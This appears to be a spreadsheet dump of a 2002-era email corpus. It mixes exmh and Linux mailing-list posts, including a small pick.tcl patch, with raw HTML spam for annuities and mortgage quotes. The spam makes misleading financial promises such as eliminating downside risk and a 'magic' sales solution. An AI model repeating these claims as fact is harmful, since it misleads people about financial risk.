 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://www.zdnet.com/techupdate/filters/main/" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020441,00.html" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020424,00.html" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020442,00.html" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020443,00.html" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020445,00.html" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020444,00.html" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020568,00.html" style="color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=624 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;tr:ad name="copyright" /&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=17-agRtnIX-oKdM4KZpIyd_CUb3qRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Thu, 22 Aug 2002 10:04:06 -0500
     From:        Chris Garrigues &lt;cwg-dated-1030460647.7351a3@DeepEddy.Com&gt;
     Message-ID:  &lt;1030028647.6462.TMDA@deepeddy.vircio.com&gt;
   | hmmm, I assume you're going to report this to the nmh folks?
 Yes, I will, sometime, after I look at the nmh sources and see what
 they have managed to break, and why.
 But we really want exmh to operate with all the versions of nmh that
 exist, don't we?   The patch to have exmh do the right thing, whether this
 bug exists, or not, is trivial, so I'd suggest including it.
 Patch follows ...
 I have no idea why the sequences were being added after the message list
 before, not that it should make any difference to nmh (or MH).   But since
 I stopped doing that, the variable "msgs" isn't really needed any more,
 rather than assigning $pick(msgs) to msgs, and then using $msgs the code
 could just use $pick(msgs) where $msgs is now used.   This is just a
 frill though, so I didn't change that.  
 kre
 --- pick.tcl	Fri Aug 23 16:28:14 2002
 +++ /usr/local/lib/exmh-2.5/pick.tcl	Sat Aug 24 18:14:44 2002
 @@ -128,7 +128,7 @@
  }
  proc Pick_It {} {
      global pick exmh
 -    set cmd [list exec pick +$exmh(folder) -list]
 +    set cmd [list exec pick +$exmh(folder)]
      set inpane 0
      set hadpane 0
      for {set pane 1} {$pane &lt;= $pick(panes)} {incr pane} {
 @@ -175,8 +175,9 @@
      }
      set msgs $pick(msgs)
      foreach s $pick(sequence) {
 -	lappend msgs -sequence $s
 +	lappend cmd -sequence $s
      }
 +    lappend cmd -list
      Exmh_Debug Pick_It $cmd $msgs
      busy PickInner $cmd $msgs
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: What is EMC Stock to Cash?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_DD23E_01C1FCF4.FA928290
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  STOCK to CASH=0A=
 Keep Your Clients' Money Working in Two Places at the
 Same Time.=0A=
 Eliminate downside risk, while keeping their upside intact.=09
  What is EMC Stock to Cash?=09
  	Your client receives 90% of their stock portfolio
 up front and in cash
  	You invest this money in either an
 annuity, life policy...or both =09
  	If the portfolio decreases in value,
 your clients' investment remains intact =09
  	If the portfolio increases in value,=20
 your clients receive the upside appreciation
  	Reduces capital gains and estate taxes=20
  Annuities Protect Stocks=09
 S2C allows you to wrap your favorite fixed annuities around your
 clients' existing stock portfolios, combining the safety features of
 tax-deferred annuities with the high growth potential of the nation's
 leading stock indices. Annuities can also be used to fund fixed life
 insurance policies. =09
   _____ =20
 Call Tim Armstrong or e-mail &lt;mailto:insuranceiq@emergingmoney.com&gt;  us
 today!
  800-396-3622x5
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 We don't want anybody to receive our mailing who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insurancemail.net
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;=20
 ------=_NextPart_000_DD23E_01C1FCF4.FA928290
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;What is EMC Stock to Cash?&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
   &lt;table width=3D"550" border=3D"2" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#003366" align=3D"center"&gt;
     &lt;tr&gt;=20
       &lt;td&gt;=20
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/emc2/header.jpg" =
 width=3D"550" height=3D"449" alt=3D"STOCK to CASH&amp;#10;Keep Your Clients' =
 Money Working in Two Places at the Same Time.&amp;#10;Eliminate downside =
 risk, while keeping their upside intact."&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/emc2/band.gif" =
 width=3D"550" height=3D"61" alt=3D'What is EMC Stock to Cash?'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"550" border=3D"0" cellspacing=3D"3" =
 cellpadding=3D"3"&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"63" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/emc2/bullet.gif" width=3D"18" =
 height=3D"18"&gt;&lt;/td&gt;
                   &lt;td width=3D"466" valign=3D"top"&gt;=20
                     &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000" =
 face=3D"Georgia, Times New Roman, Times, serif"&gt;
                       Your client receives 90% of their stock =
 portfolio&lt;br&gt;
                       up front and in cash&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"63" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/emc2/bullet.gif" width=3D"18" =
 height=3D"18"&gt;&lt;/td&gt;
                   &lt;td width=3D"466" valign=3D"top"&gt;=20
                     &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000" =
 face=3D"Georgia, Times New Roman, Times, serif"&gt;
                     You invest this money in either an&lt;br&gt;
                     annuity, life policy...or both&lt;/font&gt;&lt;/b&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"63" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/emc2/bullet.gif" width=3D"18" =
 height=3D"18"&gt;&lt;/td&gt;
                   &lt;td width=3D"466" valign=3D"top"&gt;=20
                     &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000" =
 face=3D"Georgia, Times New Roman, Times, serif"&gt;
                     If the portfolio decreases in value,&lt;br&gt;
                     your clients' investment remains intact&lt;/font&gt;&lt;/b&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"63" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/emc2/bullet.gif" width=3D"18" =
 height=3D"18"&gt;&lt;/td&gt;
                   &lt;td width=3D"466" valign=3D"top"&gt;=20
                     &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000" =
 face=3D"Georgia, Times New Roman, Times, serif"&gt;
                       If the portfolio increases in value, &lt;br&gt;
                       your clients receive the upside =
 appreciation&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;=20
                   &lt;td width=3D"63" valign=3D"top" align=3D"right"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/emc2/bullet.gif" width=3D"18" =
 height=3D"18"&gt;&lt;/td&gt;
                   &lt;td width=3D"466" valign=3D"top"&gt;=20
                     &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#000000" =
 face=3D"Georgia, Times New Roman, Times, serif"&gt;
                     Reduces capital gains and estate taxes =
 &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;br&gt;&lt;img =
 src=3D"http://63.211.81.87/images/emc2/band2.gif" width=3D"550" =
 height=3D"31" alt=3D'Annuities Protect Stocks'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"5" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;
               &lt;b&gt;&lt;font face=3D"Georgia, Times New Roman, Times, serif" =
 size=3D"2"&gt;&lt;i&gt;S&lt;font size=3D"3"&gt;2&lt;/font&gt;C=20
                 allows you to wrap your favorite fixed annuities around =
 your clients'=20
                 existing stock portfolios, combining the safety features =
 of tax-deferred=20
                 annuities with the high growth potential of the nation's =
 leading=20
                 stock indices. Annuities can also be used to fund fixed =
 life insurance=20
                 policies.&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;=20
               &lt;hr width=3D"500"&gt;
               &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#003399"&gt;&lt;b&gt;
                 Call Tim Armstrong or &lt;a =
 href=3D"mailto:insuranceiq@emergingmoney.com"&gt;e-mail&lt;/a&gt; us =
 today!&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
               &lt;br&gt;
               &lt;img src=3D"http://63.211.81.87/images/emc2/phone.gif" =
 width=3D"550" height=3D"83" alt=3D'800-396-3622x5'&gt;=20
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"98%" bgcolor=3D"#003399" align=3D"center"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr bgcolor=3D"#669999"&gt;=20
                           &lt;td colspan=3D"5" align=3D"center"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" =
 color=3D"#FFFFFF"&gt;&lt;b&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;&lt;b&gt;Name:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;&lt;b&gt;E-mail:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                            &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;&lt;b&gt;Phone:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 color=3D"#000066" face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;City:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"30%"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;&lt;b&gt;State:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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value=3D"insuranceiq@emergingmoney.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"EMC's IQ Inquiry"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"7"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;=20
               &lt;p &gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"1"&gt;We=20
                 don't want anybody to receive our mailing who does not =
 wish to=20
                 receive them. This is a professional communication sent =
 to insurance=20
                 professionals. To be removed from this mailing list, DO =
 NOT REPLY=20
                 to this message. Instead, go here: &lt;a =
 href=3D"http://www.insurancemail.net"&gt;http://www.insurancemail.net&lt;/a&gt;&lt;br=
 &gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_DD23E_01C1FCF4.FA928290--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: NEED TO FIND SOMETHING?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;title&gt;::FREE MORTGAGE QUOTE::&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;center&gt;&lt;a h=
 ref=3D"http://210.192.111.77/cgi-bin/loan_app?leadsource=3Drk"&gt;&lt;img border=
 =3D0 src=3D"http://210.192.111.76/images/Creative.jpg"&gt;&lt;BR&gt;&lt;a href=3D"http=
 ://210.192.111.77/cgi-bin/remove" style=3D"font-size:11px;font-family:Taho=
 ma,Arial,Verdana;color:#FF0000"&gt;To be removed from this list, click here.&lt;=
 /a&gt;&lt;/center&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Brent: now it's clearer (to me) what's needed. I've used the global
 sort and J C Lawrence's re-scan, but there is still a vulnerability there:
 If I have an instance of exmh running, the folder I'm visiting will have
 its new, correct .xmhcache overwritten with an incorrect one when I switch
 folders. I can cron the sort and re-scan process, but I should kill running
 exmh's first.
 Best would be to have a button for "Global sort and update all scan caches"
 in the exmh More... menu
 --
 rick
 &gt;&gt;&gt;&gt;&gt; "Brent" == Brent Welch &lt;welch@panasas.com&gt;
 &gt;&gt;&gt;&gt;&gt; wrote the following on Tue, 10 Sep 2002 14:31:48 -0700
   Brent&gt; There is an "Update all scan caches" menu entry that rescans your
   Brent&gt; folders similar to the short scripts folks have shared around.  It
   Brent&gt; runs in the background.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 20 Jul 2002 12:06:35 BST, Greg Farrel said:
 &gt;
 &gt;D'oh. I ment to say that I cant use a laptop, as I have a pci wireless
 &gt;card and the cable for it (about 180 dollars). So it has to be a pc, with
 &gt;a pci 2.2 connector (ie some pentiums, and anything above)
 There's some place in the UK that sells loads of silent gear...
 can't remember the name though... a google for "silent pc" or the
 like should turn it up.
 -- 
 	Niall
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Baseline] Raising chickens the high-tech way
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; It also strikes me that it will not be very long before livestock is
 &gt; genetically engineered to be dumber and meatier, and better adapted to
 &gt; living in industrial conditions.
 If we're willing to count artificial
 selection as genetic engineering, it
 has been happening since pre-literate
 times, and is called "domestication".
 -Dave
 &lt;http://www.baselinemag.com/article2/0,3959,369234,00.asp&gt;
 &gt; "When the truck leaves Arkansas, the invoice leaves via the U.S. mail
 &gt; and they both arrive at about the same time," Collins says. "If our
 &gt; receiving clerks could sign onto the network and do an electronic
 &gt; handshake with the driver-you're over an item on this case, that case
 &gt; was damaged-we're all in agreement, and then Tyson could send a clean
 &gt; invoice about which there is no dispute."
 I can see the value to a system which
 guaranteed that the truck would show
 up with all items as ordered -- but if
 there's going to be spoilage anyway, I
 don't see how much value that "clean"
 invoice provides -- just think about
 the costs of reliable networks versus
 reliable protocols on unreliable ones.
 If the trucks are unreliable, then the
 sticky pads seem like the clear winner
 for return on IT capital investment.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Guaranteed Best Mortgage Rate
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;body bgcolor=#FFFFFF text=#000000 &gt;
 &lt;table width=100% height=100% border=0 cellspacing=0 cellpadding=0 &gt;
   &lt;tr&gt;
     &lt;td valign=middle &gt; 
       &lt;div align=center&gt; 
         &lt;table width=550 border=0 cellspacing=0 cellpadding=0&gt;
           &lt;tr&gt; 
             &lt;td width=22 height=50 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=213 height=50 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;font size="2" face="Verdana, Arial, Helvetica, sans-serif"&gt;&lt;strong&gt;&amp;nbsp;&amp;nbsp;The 
               Best Mortage  Rates&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td colspan=2 height=50 bgcolor=979797&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;font face=Verdana, Arial, Helvetica, sans-serif color=#FFFFFF&gt;&lt;b&gt;Simple, 
               Easy and FREE&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
             &lt;td width=22 height=50 bgcolor=D5D5D5&gt;&amp;nbsp; &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width=22 height=25 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=213 height=25 bgcolor=979797&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td colspan=2 height=25 bgcolor=A6A6A6&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=22 height=25 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width=22 height=54 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td colspan=3 rowspan=2 valign=top &gt; 
               &lt;div align=left&gt; 
                 &lt;div align=center&gt;&lt;/div&gt;
                 &lt;div align=center&gt; 
                   &lt;table border=4 bordercolor=#000000 cellpadding=10 cellspacing=0
 width=506 height=100%&gt;
                     &lt;tbody&gt; 
                     &lt;tr bgcolor=efefef&gt; 
                       &lt;td colspan=2&gt;
                         &lt;div align=center&gt;&lt;font color=#ffffff 
       face=Tahoma,Arial,Helvetica size=4&gt;&lt;b&gt;&lt;font size=3 color=#333333&gt;Have 
                           HUNDREDS of lenders compete for your loan!&lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
                         &lt;/div&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt; 
                       &lt;td bgcolor=#009966 valign=top width=160&gt; &lt;br&gt;&lt;br&gt;
                         &lt;li&gt;&lt;b&gt;&lt;font color=#FFFFFF size=2 face=Arial, Helvetica,
 sans-serif&gt;Refinancing &lt;/font&gt;&lt;/b&gt; 
                         &lt;li&gt;&lt;font size=2 face=Arial, Helvetica, sans-serif&gt;&lt;b&gt;&lt;font
 color=#FFFFFF&gt;New Home Loans &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
                           &lt;li&gt;&lt;font size=2 face=Arial, Helvetica, sans-serif&gt;&lt;b&gt;&lt;font
 color=#FFFFFF&gt;Debt Consolidation &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
 &lt;li&gt;&lt;font size=2 face=Arial, Helvetica, sans-serif&gt;&lt;b&gt;&lt;font
 color=#FFFFFF&gt;Second Mortgage &lt;/font&gt;&lt;/b&gt;&lt;/font&gt; 
                         &lt;li&gt;&lt;font size=2 face=Arial, Helvetica, sans-serif&gt;&lt;b&gt;&lt;font
 color=#FFFFFF&gt;Home Equity &lt;br&gt;
                           &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color=#FFFFFF&gt;&lt;br&gt;
                           &lt;/font&gt;&lt;/b&gt;&lt;br&gt;
                           &lt;center&gt;
                               &lt;a
 href=http://61.129.68.54/master/index.php&gt;&lt;font 
       color=#ffffff face=tahoma,arial,helvetica size=4&gt;&lt;b&gt;Click Here To&lt;br&gt;
                             JUMP-START&lt;br&gt;
                             your Plans for&lt;br&gt;
                             the Future!!!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt; 
                           &lt;/center&gt;
                         &lt;/li&gt;
                       &lt;/td&gt;
                       &lt;td&gt;&lt;b&gt;&lt;font face=Verdana, Arial, Helvetica, sans-serif size=2&gt;Dear 
                         Homeowner,&lt;/font&gt;&lt;/b&gt; 
                         &lt;p align=left&gt;&lt;font color=#000000 face=Verdana, Arial, Helvetica, sans-serif new=new roman,=roman, times=times size=2&gt;Interest 
                           Rates are at their lowest point in 40 years! We help 
                           you find the best rate for your situation by matching 
                           your needs with hundreds of lenders!&lt;br&gt;
                           &lt;br&gt;
                             &lt;a 
       href=http://61.129.68.54/master/index.php&gt;&lt;b&gt;Home Improvement, Refinance, 
                             Second Mortgage, Home Equity Loans, and More!&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;font face=Verdana, Arial, Helvetica, sans-serif size=2&gt;&lt;br&gt;
                           &lt;br&gt;
                           You're eligible even with less than perfect credit!&lt;br&gt;
                           &lt;br&gt;
                           This service is &lt;font color=#000000&gt;&lt;b&gt;100% FREE&lt;/b&gt;&lt;/font&gt; 
                           to home owners and new home buyers without any obligation. 
                           &lt;br&gt;
                           &lt;br&gt;
                           Just fill out a quick, simple form and jump-start your 
                           future plans today!&lt;/font&gt;&lt;br&gt;
                           &lt;br&gt;
                             &lt;a 
       href=http://61.129.68.54/master/index.php&gt;&lt;font 
       color=#00b000 face=verdana,arial,helvetica size=5&gt;&lt;b&gt;&lt;font
 color=#009933&gt;Click Here To Begin&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/a&gt; &lt;font 
 size=1&gt; &lt;/font&gt;&lt;/p&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;/tbody&gt; 
                   &lt;/table&gt;
                 &lt;/div&gt;
               &lt;/div&gt;
               &lt;/td&gt;
             &lt;td width=22 height=54 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width=22 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=22 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td height=20 bgcolor=D5D5D5 width=22&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td height=20 colspan=3 bgcolor=#dedede&gt;
               &lt;div align=left&gt;
                 &lt;div align=center&gt;&lt;/div&gt;
               &lt;/div&gt;
               &lt;div align=center&gt; 
                 &lt;table border=0 cellpadding=4 cellspacing=0 width=500&gt;
                   &lt;tbody&gt; 
                   &lt;tr&gt; 
                       &lt;td&gt;&lt;font color=#000000 
       face=Verdana size=1&gt;You are receiving this email because you registered 
                         at one of JUNCAN.net's partner sites, and agreed to receive 
                         gifts and special offers that may be of interest to you. 
                         If you do not want to receive special offers in the future, 
                         please &lt;a href=http://61.129.68.54/empires/remove/remove.html&gt;click 
                         here&lt;/a&gt;.&lt;br&gt;
                       You are subscribed as: webmaster@efi.ie &lt;/font&gt;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;/tbody&gt; 
                 &lt;/table&gt;
               &lt;/div&gt;
             &lt;/td&gt;
             &lt;td height=20 bgcolor=D5D5D5 width=22&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td width=22 height=26 bgcolor=CCCCCC&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td height=26 bgcolor=CCCCCC width=213&gt;&lt;font face=Verdana, Arial size=1&gt;&amp;nbsp; 
               &lt;/font&gt;&lt;/td&gt;
             &lt;td height=26 bgcolor=797975 width=268&gt; 
               &lt;div align=right&gt;&lt;font face=Verdana, arial=Arial size=1 color=#FFFFFF&gt;Equal 
                 Housing Opportunity&lt;/font&gt;&lt;font face=Verdana, Arial size=1&gt;.&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td height=26 bgcolor=797975 width=25&gt;&amp;nbsp;&lt;/td&gt;
             &lt;td width=22 height=26 bgcolor=D5D5D5&gt;&amp;nbsp;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Triple Your Index Annuity Sales
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_253BBB_01C23BCA.9FD9F850
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  The Magical Solution that Triples Index Annuity Sales!
 As a unique promotional opportunity, there is currently no charge for
 our "Big-Hitter Sales Tool Combination" (for the first 199 respondents
 only).
 This "Magic Solution" is already responsible for countless millions of
 dollars in Index Annuity premium and Agent Sales Commissions. You
 honestly will not believe how simple and easy this makes selling Index
 Annuities. It is literally like falling off a log. As one rep stated,
 "You don't even have to do anything different than you already are
 doing...it just kind of happens...Kicks-in and starts generating new
 clients and uncovering assets just like magic!"
 To claim your free Report and Bonus Audiotape, simply call our 24-hour
 automated response line! Simple and painless. Call anytime (but be one
 of the first 199), the response line is fully automated and works 24/7.
 Or, you can quickly fill out the form below.
   _____  
 Call today to receive this free report and audiotape!
  800-436-1631 ext 86055
 ? or can complete the form below ?
 Name:	  	
 Address:	  	
 City:	  	State:	  	Zip:	  	
 E-mail:	  	
 Phone:	  	Fax: 	  	 	
 USA Financial - www.usa-financial.com &lt;http://www.usa-financial.com&gt;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------=_NextPart_000_253BBB_01C23BCA.9FD9F850
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Triple Your Index Annuity Sales&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
